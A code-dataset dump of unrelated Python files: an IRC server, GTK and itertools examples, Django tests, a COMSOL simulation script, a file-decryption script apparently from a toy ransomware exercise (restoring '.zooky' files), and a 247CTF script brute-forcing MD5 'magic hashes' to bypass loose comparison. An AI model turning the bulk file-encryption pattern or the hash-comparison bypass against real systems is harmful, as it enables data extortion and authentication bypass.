dict_product(param_space)]\nmodel_results = { (d, p) : model_cv_predictions(d, p) for d, p in product(proteases, parameter_sets) }\n","repo_name":"asford/protease_experimental_analysis","sub_path":"workspace/sequence_protease_susceptibility_analysis.py","file_name":"sequence_protease_susceptibility_analysis.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"17463323206","text":"import socket\r\nfrom threading import Thread\r\nimport threading\r\nimport time\r\nimport platform\r\n\r\n# Creating the socket\r\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nhost = \"10.0.42.17\"\r\n# host = \"\"\r\nport = 3456\r\nserversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\nserversocket.bind((host, port))\r\n# Prepare the initial client list\r\nclient_list = []\r\n# Prepare the initial channel list\r\nchannel_list = [\"#test\", \"#general\"]\r\n\r\n\r\n# ----- NOT IMPLIMENTED -----\r\n# Ping function sends a ping to users\r\n# def ping():\r\n# print(\"Pinging\")\r\n# for client in client_list:\r\n# print(\"Found a user \" + client.user)\r\n# ping = 'PING ' + client.user + '\\n'\r\n# client.sock.send(ping.encode())\r\n# resp = client.sock.recv(2 ** 10).decode()\r\n# if(\"PONG\" not in resp):\r\n# #For each client, send message that user has quit\r\n# for client2 in client_list:\r\n# message = ':' + client.nick + \"!\" + client.user + '@' + platform.node() + ' QUIT ' + client.nick + '\\n'\r\n# client2.sock.send(message.encode())\r\n# #Remove user from list of clients and then close the socket\r\n# client_list.remove(client)\r\n# 
client.sock.close()\r\n\r\n\r\n\r\n# The client class\r\nclass client(Thread):\r\n # Constructor for the client class\r\n def __init__(self, socket, address):\r\n Thread.__init__(self)\r\n self.sock = socket\r\n self.addr = address\r\n self.nick = \"\"\r\n self.user = \"\"\r\n self.channel = []\r\n self.start()\r\n\r\n def run(self):\r\n try:\r\n #While username and nickname not set\r\n while self.nick == \"\" and self.user == \"\":\r\n \r\n while self.user == \"\":\r\n # Read received data\r\n message = self.sock.recv(2 ** 10).decode()\r\n\r\n for line in message.splitlines():\r\n # print(line)\r\n messageParsed = line.split(' ')\r\n # Check if the client is sending a nickname parameter\r\n if(messageParsed[0] == \"NICK\"):\r\n if(messageParsed[1] != \"\"):\r\n global client_list\r\n for client in client_list:\r\n # If a nickname already exists, inform the user\r\n if messageParsed[1] == client.nick:\r\n message = self.nick + ' ' + messageParsed[1] + ':Nickname is already in use\\n'\r\n self.sock.send(message.encode())\r\n self.sock.close()\r\n return\r\n self.nick = messageParsed[1]\r\n else:\r\n self.sock.send(b'Invalid Paramater for NICK')\r\n\r\n # Check if the client is sending a username parameter\r\n if(messageParsed[0] == \"USER\"):\r\n if(messageParsed[1] != \"\"):\r\n self.user = messageParsed[1]\r\n else:\r\n self.sock.send(b'Invalid Paramater for USER')\r\n\r\n print(\"User: \" + self.user + \" Nick: \" + self.nick)\r\n if(self.nick != \"\" and self.user != \"\"):\r\n print(\"Adding \" + self.user + \" to client list\")\r\n client_list.append(self)\r\n\r\n # Constructing and sending the initial welcome messages\r\n REPLY_001 = ':' + host + ' 001 ' + self.nick + ' :Welcome to the IRC server!\\n'\r\n REPLY_002 = ':' + host + ' 002 ' + self.nick + ' :Your host is ' + 'Nox\\n'\r\n REPLY_003 = ':' + host + ' 003 ' + self.nick + ' :This server was created ..\\n'\r\n message = REPLY_001 + REPLY_002 + REPLY_003 + \"Join general by typing /join #general\\n\"\r\n \r\n self.sock.send(message.encode())\r\n \r\n while True:\r\n\r\n message = self.sock.recv(1024).decode()\r\n for line in message.splitlines():\r\n messageParsed = line.split(' ')\r\n\r\n #Join channel protocol\r\n if(messageParsed[0] == \"JOIN\"):\r\n found = False\r\n for channel in channel_list:\r\n if(messageParsed[1] == channel):\r\n found = True\r\n channel = messageParsed[1]\r\n\r\n #If channel not found, create channel with name\r\n if(not found):\r\n channel_list.append(channel)\r\n found = True\r\n\r\n #If channel found, send reply codes and broadcast to everyone in channel\r\n if (found):\r\n self.channel.append(channel)\r\n REPLY_331 = ':' + host + ' 331 ' + self.nick + ' ' + channel + ' :No topic is set\\n'\r\n REPLY_353 = ':' + host + ' 353 ' + self.nick + ' = ' + channel + ' :'\r\n\r\n #Add every client in channel to list of users\r\n for client in client_list:\r\n for clientChannel in client.channel:\r\n if(clientChannel == channel):\r\n REPLY_353 = REPLY_353 + ' ' + client.nick\r\n REPLY_353 = REPLY_353 + '\\n'\r\n\r\n REPLY_366 = ':' + host + ' 366 ' + self.nick + ' ' + channel + ' :End of NAMES list\\n'\r\n REPLY = ':' + self.nick + \"!\" + self.user + '@' + platform.node() + ' ' + line + '\\n'\r\n message = REPLY + REPLY_331 + REPLY_353 + REPLY_366\r\n print(message)\r\n\r\n #If client in channel, send message\r\n for client in client_list:\r\n for clientChannel in client.channel:\r\n if(clientChannel == channel):\r\n client.sock.send(message.encode())\r\n\r\n #Leave channel protocol\r\n if(messageParsed[0] 
== \"PART\"):\r\n if(self.channel):\r\n channel = messageParsed[1]\r\n message = ':' + self.nick + \"!\" + self.user + '@' + platform.node() + ' ' + line + '\\n'\r\n #For each client in channel, send message that user left\r\n for client in client_list:\r\n for clientChannel in client.channel:\r\n if(clientChannel == channel):\r\n client.sock.send(message.encode())\r\n #Remove channel frm users channel list\r\n self.channel.remove(channel)\r\n\r\n #Leave server protocol\r\n if(messageParsed[0] == \"QUIT\"):\r\n #For each client, send message that user has quit\r\n for client in client_list:\r\n message = ':' + self.nick + \"!\" + self.user + '@' + platform.node() + ' ' + line + '\\n'\r\n client.sock.send(message.encode())\r\n #Remove user from list of clients and then close the socket\r\n client_list.remove(self)\r\n self.sock.close()\r\n\r\n #Message protocol\r\n if(messageParsed[0] == \"PRIVMSG\"):\r\n channel = messageParsed[1]\r\n for client in client_list:\r\n \r\n #Message Channel\r\n for clientChannel in client.channel:\r\n if(clientChannel == channel):\r\n if (client != self):\r\n message = ':' + self.nick + \"!\" + self.user + '@' + platform.node() + ' ' + line + '\\n'\r\n client.sock.send(message.encode())\r\n\r\n\r\n #Message User\r\n if(messageParsed[1] == client.nick):\r\n if(messageParsed[2] != \":\"):\r\n if(messageParsed[1] != self.nick):\r\n message = ':' + self.nick + \"!\" + self.user + '@' + platform.node() + ' ' + line + '\\n'\r\n client.sock.send(message.encode())\r\n\r\n except socket.error:\r\n #If socket error, remove client from list then close socket connection\r\n client_list.remove(self)\r\n self.sock.close()\r\n return\r\n\r\n#Listen for client connections to server\r\nserversocket.listen(5)\r\nprint(\"Server started and Listening\")\r\n\r\nwhile True:\r\n clientsocket, address = serversocket.accept()\r\n client(clientsocket, address)\r\n \r\n # ----- NOT IMPLIMENTED -----\r\n # t = threading.Timer(5.0, lambda: ping())\r\n # t.daemon = True\r\n # t.start()\r\n","repo_name":"mariusurbelis/irc","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21058395076","text":"#!/usr/bin/env python\n\nimport gtk\n\ndistributions = [\"Ubuntu\", \"Debian\", \"Sabayon\", \"Fedora\", \"Arch\", \"Mint\", \"Slackware\", \"Mandriva\", \"Sidux\", \"Mepis\"]\n\nclass EntryCompletion:\n def __init__(self):\n window = gtk.Window()\n \n liststore = gtk.ListStore(str)\n for item in distributions:\n liststore.append([item])\n \n self.completion = gtk.EntryCompletion()\n self.completion.set_model(liststore)\n self.completion.set_text_column(0)\n\n comboboxentry = gtk.Entry()\n comboboxentry.set_completion(self.completion)\n \n window.connect(\"destroy\", lambda w: gtk.main_quit())\n\n window.add(comboboxentry)\n \n window.show_all()\n\nEntryCompletion()\ngtk.main()\n","repo_name":"Chiheb-Nexus/pygtk-tutorial","sub_path":"examples/entrycompletion.py","file_name":"entrycompletion.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10563069614","text":"import itertools\n\n\ndef main():\n L1= [13, 15, 12, 17, 15]\n L2 = [\"fifi\", \"riri\", \"loulou\"]\n # sans itertools\n L3 = []\n for i in range(len(L1)):\n L3.append(L1[i])\n if i < len(L2):\n L3.append(L2[i])\n\n # compréhension de liste ==> itertools\n #result = [x for x in 
itertools.chain.from_iterable(itertools.zip_longest(L1, L2)) if x]\n\n print(L3)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"juliencampus/python","sub_path":"Virginie/etape2_3.py","file_name":"etape2_3.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43579653575","text":"import os\nfrom cryptography.fernet import Fernet\n\nwith open('filekey.key', 'rb') as filekey: \n key = filekey.read()\n\nfernet = Fernet(key) \n\nfor path, subdirs, files in os.walk('./test'):\n for name in files:\n print(os.path.join(path, name))\n filepath = os.path.join(path, name)\n with open(filepath, 'rb') as enc_file: \n encrypted = enc_file.read() \n \n decrypted = fernet.decrypt(encrypted) \n \n with open(filepath, 'wb') as dec_file:\n dec_file.write(decrypted)\n filepath2=filepath.replace('.zooky','')\n os.rename(filepath, filepath2)\n \n\n","repo_name":"vogeaux/crypt_rew","sub_path":"dechiffrement_all.py","file_name":"dechiffrement_all.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28155629360","text":"import pytest\n\nfrom epilogue import models\n\nfrom django.urls import reverse\n\n\n@pytest.fixture\ndef user_creation_data():\n return {\n \"first_name\" : \"Shikhar\"\n }\n\n@pytest.fixture\ndef user():\n print(models.Customer.objects.count())\n return models.Customer.objects.first()\n\n@pytest.mark.django_db\ndef test_a_respond_201_when_user_onboards_only_with_name(client, user_creation_data):\n print(\"Executing test 1 *****\")\n response = client.post(\n reverse(\"user\"), user_creation_data\n )\n assert response.status_code == 201\n\n@pytest.mark.django_db\ndef a_test_b_respond_update_when_user_adds_gender(client,user):\n print(\"Executing test 2\")\n response = client.post(\n reverse(\"user-entry\", kwargs = {\"pk\":user.id}),\n {\n \"gender\": \"male\"\n },\n AUTHORIZATION = \"Token %d\"%user.auth_token.key\n )\n assert response.status_code == 200, \"Something Went wrong\"\n\n\n","repo_name":"dotslash227/98fitcortex","sub_path":"testing/epilogue/tests/integration/test_user_creation.py","file_name":"test_user_creation.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12188418722","text":"import hashlib\nimport re\n\ndef isTargetHashFound(digest):\n return re.match(\"0e[0-9]{30}\", digest.hex())\n\n\ndef nat():\n n = 0\n while True:\n yield n\n n = n + 1\n\nfor i in nat():\n if isTargetHashFound(hashlib.md5(bytes(\"f789bbc328a3d1a3\" + str(i) , \"ascii\")).digest()):\n print(\"cracked input: \", i)\n break\n\n","repo_name":"GintsEngelen/CTF","sub_path":"247CTF/Web/Compare the Pairs/Brute Force.py","file_name":"Brute Force.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18777307361","text":"import mph\nfrom jpype import JBoolean, JClass, JArray, JString\nimport time\n\n\ndef printElapsedTime(startTime, index):\n elapsedTime = time.time() - startTime\n minutes = int(elapsedTime // 60)\n seconds = int(elapsedTime % 60)\n print(f\"Until {index}: {minutes} minutes {seconds} seconds\")\n\n\ndef runSimulation(\n outer_contour_file_path,\n inner_contour_file_path=None,\n mesh_resolution=\"normal\",\n model_path=None,\n):\n # Pre\n print(f\"running simulation\")\n 
print(f\"mesh_resolution: {mesh_resolution}\")\n startTime = time.time()\n\n client = mph.start()\n # server = mph.Server(cores=1)\n\n # create the model.java\n model = client.create(\"Model\")\n\n model.java.modelPath(\"./\")\n\n # show Jpype the intention of using an integer with Integer()\n # this has to run after the model is created\n Integer = JClass(\"java.lang.Integer\")\n\n model.java.label(\"silver_plasmonic_nano_antenna.mph\")\n\n model.java.title(\"Silver Plasmonic Nano Antenna\")\n\n # Main\n model.java.param().set(\"w\", \"750[nm]\", \"Width of physical geometry\")\n model.java.param().set(\"w\", \"750[nm]\", \"Width of physical geometry\")\n model.java.param().set(\"t_pml\", \"150[nm]\", \"PML thickness\")\n model.java.param().set(\"h_air\", \"400[nm]\", \"Air domain height\")\n model.java.param().set(\"h_subs\", \"250[nm]\", \"Substrate domain height\")\n model.java.param().set(\"na\", \"1\", \"Refractive index, air\")\n model.java.param().set(\"nb\", \"1.5\", \"Refractive index, substrate\")\n model.java.param().set(\"lda0\", \"532[nm]\", \"Wavelength\")\n model.java.param().set(\"phi\", \"0\", \"Azimuthal angle of incidence in both media\")\n model.java.param().set(\"theta\", \"0\", \"Polar angle of incidence in air\")\n model.java.param().set(\n \"thetab\", \"asin(na/nb*sin(theta))\", \"Polar angle in substrate\"\n )\n model.java.param().set(\"I0\", \"1[W/m^2]\", \"Intensity of incident field\")\n model.java.param().set(\"P\", \"I0*w^2*cos(theta)\", \"Port power\")\n\n model.java.component().create(\"comp1\", JBoolean(True))\n\n model.java.component(\"comp1\").geom().create(\"geom1\", 3)\n\n model.java.result().table().create(\"tbl1\", \"Table\")\n model.java.result().table().create(\"tbl2\", \"Table\")\n\n model.java.component(\"comp1\").mesh().create(\"mesh1\")\n\n model.java.component(\"comp1\").geom(\"geom1\").selection().create(\n \"csel1\", \"CumulativeSelection\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").selection(\"csel1\").label(\n \"Physical Domains Geometry\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").create(\"blk1\", \"Block\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"selresult\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"pos\", [\"0\", \"0\", \"(h_air+t_pml)/2\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\"base\", \"center\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"size\", [\"w+2*t_pml\", \"w+2*t_pml\", \"h_air+t_pml\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layername\", [\"Layer 1\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").setIndex(\n \"layer\", \"t_pml\", 0\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layerleft\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layerright\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layerfront\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layerback\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layerbottom\", JBoolean(False)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk1\").set(\n \"layertop\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").create(\"blk2\", \"Block\")\n 
model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"selresult\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"pos\", [\"0\", \"0\", \"-(h_subs+t_pml)/2\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\"base\", \"center\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"size\", [\"w+2*t_pml\", \"w+2*t_pml\", \"h_subs+t_pml\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"layername\", [\"Layer 1\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").setIndex(\n \"layer\", \"t_pml\", Integer(0)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"layerleft\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"layerright\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"layerfront\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"blk2\").set(\n \"layerback\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").create(\"sel_pc1\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc1\").selection(\n \"selection\"\n ).init(2)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc1\").selection(\n \"selection\"\n ).set(\"blk1(1)\", 31, 54)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc1\").selection(\n \"selection\"\n ).set(\"blk2(1)\", 34, 57)\n model.java.component(\"comp1\").geom(\"geom1\").create(\"sel_pc2\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc2\").selection(\n \"selection\"\n ).init(2)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc2\").selection(\n \"selection\"\n ).set(\"blk1(1)\", 32, 39)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_pc2\").selection(\n \"selection\"\n ).set(\"blk2(1)\", 35, 42)\n model.java.component(\"comp1\").geom(\"geom1\").create(\"sel_ftri1\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_ftri1\").selection(\n \"selection\"\n ).init(2)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_ftri1\").selection(\n \"selection\"\n ).set(\"blk1(1)\", 31, 32, 39, 54)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel_ftri1\").selection(\n \"selection\"\n ).set(\"blk2(1)\", 34, 35, 42, 57)\n model.java.component(\"comp1\").geom(\"geom1\").create(\"air\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"air\").selection(\n \"selection\"\n ).set(\"blk1(1)\", 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18)\n model.java.component(\"comp1\").geom(\"geom1\").create(\"substrate\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"substrate\").selection(\n \"selection\"\n ).set(\"blk2(1)\", 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18)\n model.java.component(\"comp1\").geom(\"geom1\").create(\"wp1\", \"WorkPlane\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").set(\n \"unite\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().create(\n \"image_ic\", \"InterpolationCurve\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"image_ic\"\n ).set(\"type\", \"solid\")\n 
model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"image_ic\"\n ).set(\"source\", \"file\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"image_ic\"\n ).set(\"filename\", outer_contour_file_path)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"image_ic\"\n ).set(\"struct\", \"sectionwise\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"image_ic\"\n ).set(\"rtol\", 0.001)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().create(\n \"scale_ic\", \"Scale\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"scale_ic\"\n ).setIndex(\"factor\", \"5.000000000000001E-7/2400\", Integer(0))\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp1\").geom().feature(\n \"scale_ic\"\n ).selection(\"input\").set(\"image_ic\")\n model.java.component(\"comp1\").geom(\"geom1\").create(\"ext1\", \"Extrude\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"ext1\").setIndex(\n \"distance\", \"40[nm]\", Integer(0)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"ext1\").selection(\"input\").set(\n \"wp1\"\n )\n nano_particle_handle = None\n if inner_contour_file_path is not None:\n model.java.component(\"comp1\").geom(\"geom1\").create(\"wp2\", \"WorkPlane\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").set(\n \"unite\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().create(\n \"ic1\", \"InterpolationCurve\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"ic1\"\n ).set(\"type\", \"solid\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"ic1\"\n ).set(\"source\", \"file\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"ic1\"\n ).set(\"filename\", inner_contour_file_path)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"ic1\"\n ).set(\"struct\", \"sectionwise\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"ic1\"\n ).set(\"rtol\", 0.001)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().create(\n \"scale_ic1\", \"Scale\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"scale_ic1\"\n ).label(\"Scale\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"scale_ic1\"\n ).setIndex(\"factor\", \"5.000000000000001E-7/2400\", Integer(0))\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"wp2\").geom().feature(\n \"scale_ic1\"\n ).selection(\"input\").set(\"ic1\")\n model.java.component(\"comp1\").geom(\"geom1\").create(\"ext2\", \"Extrude\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"ext2\").setIndex(\n \"distance\", \"40[nm]\", Integer(0)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"ext2\").selection(\n \"input\"\n ).set(\"wp2\")\n model.java.component(\"comp1\").geom(\"geom1\").create(\"mov2\", \"Move\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").label(\"Move\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"displx\", \"-250[nm]\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"disply\", \"-250[nm]\"\n )\n 
model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").selection(\n \"input\"\n ).set(\"ext1\", \"ext2\")\n model.java.component(\"comp1\").geom(\"geom1\").create(\"dif1\", \"Difference\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").label(\n \"Nanoparticle\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").set(\n \"contributeto\", \"csel1\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").set(\n \"selresult\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").set(\n \"selresultshow\", \"all\"\n )\n\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").selection(\n \"input\"\n ).set(\"mov2(1)\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"dif1\").selection(\n \"input2\"\n ).set(\"mov2(2)\")\n\n nano_particle_handle = \"geom1_dif1\"\n else:\n model.java.component(\"comp1\").geom(\"geom1\").create(\"mov2\", \"Move\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").label(\n \"Nanoparticle\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"contributeto\", \"csel1\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"selresult\", JBoolean(True)\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"selresultshow\", \"all\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"displx\", \"-250[nm]\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").set(\n \"disply\", \"-250[nm]\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"mov2\").selection(\n \"input\"\n ).set(\"ext1\")\n nano_particle_handle = \"geom1_mov2\"\n model.java.component(\"comp1\").geom(\"geom1\").run(\"fin\")\n model.java.component(\"comp1\").geom(\"geom1\").create(\"sel1\", \"ExplicitSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel1\").label(\n \"Physical domains without antenna\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel1\").selection(\n \"selection\"\n ).set(\"fin(1)\", 18, 19)\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"sel1\").set(\n \"contributeto\", \"csel1\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").create(\"comsel1\", \"ComplementSelection\")\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"comsel1\").label(\n \"PML Domains Geometry\"\n )\n model.java.component(\"comp1\").geom(\"geom1\").feature(\"comsel1\").set(\n \"input\", [\"csel1\"]\n )\n model.java.component(\"comp1\").geom(\"geom1\").run()\n if inner_contour_file_path is not None:\n model.java.component(\"comp1\").geom(\"geom1\").run(\"dif1\")\n\n model.java.component(\"comp1\").selection().create(\"sel2\", \"Explicit\")\n model.java.component(\"comp1\").selection(\"sel2\").set(1, 2, 3)\n model.java.component(\"comp1\").selection().create(\"sel3\", \"Explicit\")\n model.java.component(\"comp1\").selection(\"sel3\").geom(\"geom1\", 3, 2, [\"exterior\"])\n model.java.component(\"comp1\").selection(\"sel3\").set(1, 2, 3, 4, 5, 6, 7)\n model.java.component(\"comp1\").selection().create(\"uni1\", \"Union\")\n\n model.java.component(\"comp1\").variable().create(\"var1\")\n model.java.component(\"comp1\").variable(\"var1\").set(\"ewfd.Ey\", \"0\")\n model.java.component(\"comp1\").variable(\"var1\").set(\"ewfd.Ez\", \"0\")\n model.java.component(\"comp1\").variable(\"var1\").set(\"ewfd.Ex\", \"0\")\n 
model.java.component(\"comp1\").variable(\"var1\").selection().named(\"geom1_comsel1\")\n model.java.component(\"comp1\").variable().create(\"var2\")\n model.java.component(\"comp1\").variable(\"var2\").set(\"E0x\", \"-sin(phi)\")\n model.java.component(\"comp1\").variable(\"var2\").set(\"E0y\", \"cos(phi)\")\n model.java.component(\"comp1\").variable(\"var2\").selection().geom(\"geom1\", Integer(2))\n model.java.component(\"comp1\").variable(\"var2\").selection().set(62, 68)\n model.java.component(\"comp1\").variable().create(\"var3\")\n model.java.component(\"comp1\").variable(\"var3\").set(\n \"nrelPoav\",\n \"nx*ewfd2.relPoavx+ny*ewfd2.relPoavy+nz*ewfd2.relPoavz\",\n \"Relative normal Poynting flux\",\n )\n model.java.component(\"comp1\").variable(\"var3\").set(\n \"sigma_sc\", \"intop_surf(nrelPoav)/I0\", \"Scattering cross section\"\n )\n model.java.component(\"comp1\").variable(\"var3\").set(\n \"sigma_abs\", \"intop_vol(ewfd2.Qh)/I0\", \"Absorption cross section\"\n )\n model.java.component(\"comp1\").variable(\"var3\").set(\n \"sigma_ext\", \"sigma_sc+sigma_abs\", \"Extinction cross section\"\n )\n\n model.java.component(\"comp1\").view(\"view1\").clip().create(\"plane1\", \"ClipPlane\")\n model.java.component(\"comp1\").view(\"view1\").clip().create(\"plane2\", \"ClipPlane\")\n\n model.java.component(\"comp1\").material().create(\"mat1\", \"Common\")\n model.java.component(\"comp1\").material().create(\"mat2\", \"Common\")\n model.java.component(\"comp1\").material().create(\"mat5\", \"Common\")\n model.java.component(\"comp1\").material(\"mat1\").selection().named(\"geom1_air\")\n model.java.component(\"comp1\").material(\"mat1\").propertyGroup().create(\n \"RefractiveIndex\", \"Refractive index\"\n )\n model.java.component(\"comp1\").material(\"mat2\").selection().named(\"geom1_substrate\")\n model.java.component(\"comp1\").material(\"mat2\").propertyGroup().create(\n \"RefractiveIndex\", \"Refractive index\"\n )\n model.java.component(\"comp1\").material(\"mat5\").selection().named(\n f\"{nano_particle_handle}_dom\"\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup().create(\n \"RefractiveIndex\", \"Refractive index\"\n )\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func().create(\"int1\", \"Interpolation\")\n model.java.component(\"comp1\").material(\"mat5\").propertyGroup(\n \"RefractiveIndex\"\n ).func().create(\"int2\", \"Interpolation\")\n\n model.java.component(\"comp1\").cpl().create(\"intop1\", \"Integration\")\n model.java.component(\"comp1\").cpl().create(\"intop2\", \"Integration\")\n model.java.component(\"comp1\").cpl(\"intop1\").selection().named(\n f\"{nano_particle_handle}_dom\"\n )\n model.java.component(\"comp1\").cpl(\"intop2\").selection().named(\n f\"{nano_particle_handle}_bnd\"\n )\n\n model.java.component(\"comp1\").coordSystem().create(\"pml1\", \"PML\")\n model.java.component(\"comp1\").coordSystem(\"pml1\").selection().named(\"geom1_comsel1\")\n\n model.java.component(\"comp1\").physics().create(\n \"ewfd\", \"ElectromagneticWavesFrequencyDomain\", \"geom1\"\n )\n model.java.component(\"comp1\").physics(\"ewfd\").selection().named(\"geom1_csel1_dom\")\n model.java.component(\"comp1\").physics(\"ewfd\").create(\n \"wee2\", \"WaveEquationElectric\", Integer(3)\n )\n 